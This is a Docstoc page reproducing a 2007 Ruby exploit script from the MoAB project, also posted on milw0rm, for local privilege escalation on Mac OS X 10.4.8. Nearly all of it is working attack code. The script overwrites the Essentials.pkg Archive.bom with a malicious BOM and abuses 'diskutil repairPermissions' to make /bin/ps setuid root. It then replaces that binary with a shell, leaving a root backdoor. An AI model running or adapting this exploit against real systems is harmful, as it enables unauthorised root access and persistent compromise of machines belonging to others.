Docstoc
EXCLUSIVE OFFER FOR DOCSTOC USERS
Try the all-new QuickBooks Online for FREE.  No credit card required.

Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit

Document Sample
Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit Powered By Docstoc
					                 Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit                      Page 1/3
  1    #!/usr/bin/ruby
  2    # (c) 2006 LMH <lmh [at] info−pull.com>
  3    #          Kevin Finisterre <kf_lists [at] digitalmunition.com>
  4    #
  5    # Thanks to The French Connection for bringing this in−the−wild 0−day to
  6    # our attention. If /tmp/ps2 exists on your system, you’ve been pwned already.
  7    # Thanks to the original authors of the exploit (’meow’). You know who you are.
  8    #
  9    # "They did it for the lulz"   − A Fakecure spokesperson on the ’Mother Of all Bombs’.
 10    # "kcoc kcus I ro tcarter uoY" − The Original Drama P3dobear (Kumo’ n’).
 11    #
 12
 13    require ’fileutils’
 14
 15    # Basic configuration
 16    TARGET_BINARY       =      "/bin/ps"     # Changing this requires you to create a new TEH_EVIL_BOM
 17    TARGET_BACKUP_PATH =       "/tmp/ps2" # see: "man lsbom" and "man mkbom"
 18    TARGET_SHELL_PATH   =      "/usr/bin/id" # Ensure the binary doesn’t drop privileges!
 19    BOMARCHIVE_PATH     =      "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
 20    DISKUTIL_PATH       =      "/usr/sbin/diskutil"
 21    TEH_EVIL_BOM        =      File.read("Evil.bom")
 22
 23    #
 24    # Repair a rogue installation using the back−up files. Useful for testing.
 25    # Probably you don’t want to repair on real pwnage... :−)
 26    #
 27    def do_repair()
 28      puts "++ Repairing (moving back−ups to original path)"
 29      puts "++ #{File.basename(BOMARCHIVE_PATH)}"
 30      FileUtils.rm_f BOMARCHIVE_PATH
 31      FileUtils.cp File.join("/tmp", File.basename(BOMARCHIVE_PATH)), BOMARCHIVE_PATH
 32
 33      puts "++ #{TARGET_BINARY}"
 34      FileUtils.rm_f TARGET_BINARY
 35      FileUtils.cp TARGET_BACKUP_PATH, TARGET_BINARY
 36
 37      puts "++ Removing back−ups..."
 38      FileUtils.rm_f TARGET_BACKUP_PATH
 39      FileUtils.rm_f File.join("/tmp", File.basename(BOMARCHIVE_PATH))
 40
 41      puts "++ Done. Repairing disk permissions..."
 42      exec "#{DISKUTIL_PATH} repairPermissions /"
 43    end
 44
 45    #
 46    # Ovewrite TARGET_BINARY with TARGET_SHELL_PATH and set the rogue permissions unless
 47    # they are already properly set.
 48    #
 49    def exploit_bomb()
 50      puts "++ We get signal. Overwriting #{TARGET_BINARY} with #{TARGET_SHELL_PATH}."
 51
 52      # Overwriting with this method will always work well if binary at TARGET_SHELL_PATH
MoAB                                                                                                        01/05/2007
                 Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit         Page 2/3
 53      # is bigger than TARGET_BINARY (ex. /bin/sh is 1068844 bytes and /bin/ps is 68432).
 54      # An alternative method is running diskutil again to set the rogue permissions.
 55      over = File.new(TARGET_BINARY, "w")
 56      over.write(File.read(TARGET_SHELL_PATH))
 57      over.close
 58
 59      unless FileTest.setuid?(TARGET_BINARY)
 60        fork do
 61          FileUtils.rm_f TARGET_BINARY
 62          FileUtils.cp TARGET_SHELL_PATH, TARGET_BINARY
 63          exec "#{DISKUTIL_PATH} repairPermissions /"
 64        end
 65        Process.wait
 66      end
 67
 68      puts "++ Done. Happy ruuting."
 69    end
 70
 71    #
 72    # Overwrite the BOM with the rogue version, set new permissions.
 73    #
 74    def set_up_the_bomb()
 75      puts "++ Preparing to overwrite (#{BOMARCHIVE_PATH})"
 76
 77      # Back−up the original Archive.bom, set mode to 777
 78      if FileTest.writable?(BOMARCHIVE_PATH)
 79        backup_path = File.join("/tmp", File.basename(BOMARCHIVE_PATH))
 80
 81        unless FileTest.exists?(backup_path)
 82          puts "++ Creating backup copy at #{backup_path}"
 83          FileUtils.cp BOMARCHIVE_PATH, backup_path
 84        end
 85
 86        puts "++ Removing original file."
 87        FileUtils.rm_f BOMARCHIVE_PATH
 88
 89        puts "++ Writing backdoor BOM file."
 90        target_bom = File.new(BOMARCHIVE_PATH, "w")
 91        target_bom.write(TEH_EVIL_BOM)
 92        target_bom.close
 93        puts "++ Done."
 94      else
 95        puts "−− Can’t write to ’#{BOMARCHIVE_PATH}. No pwnage for you today."
 96        exit
 97      end
 98
 99      # Back−up the target backdoor path
 100     unless FileTest.exists?(TARGET_BACKUP_PATH)
 101       puts "++ Creating backup copy of #{TARGET_BINARY} at #{TARGET_BACKUP_PATH}"
 102       FileUtils.cp TARGET_BINARY, TARGET_BACKUP_PATH
 103     end
 104

MoAB                                                                                           01/05/2007
                 Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit   Page 3/3
 105     # Let diskutil do it’s job (set permissions over target binary path, setuid)
 106     puts "++ Running diskutil to set the new permissions for the backdoor..."
 107     fork do
 108       exec "#{DISKUTIL_PATH} repairPermissions /"
 109     end
 110     Process.wait
 111
 112     puts "++ Somebody set up us the bomb!"
 113     exploit_bomb()
 114   end
 115
 116   # Here be pwnies
 117   if ARGV[0] == "repair"
 118     do_repair()
 119   else
 120     set_up_the_bomb()
 121   end
 122
 123   # milw0rm.com [2007−01−05]




MoAB                                                                                     01/05/2007

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:23
posted:5/24/2010
language:English
pages:3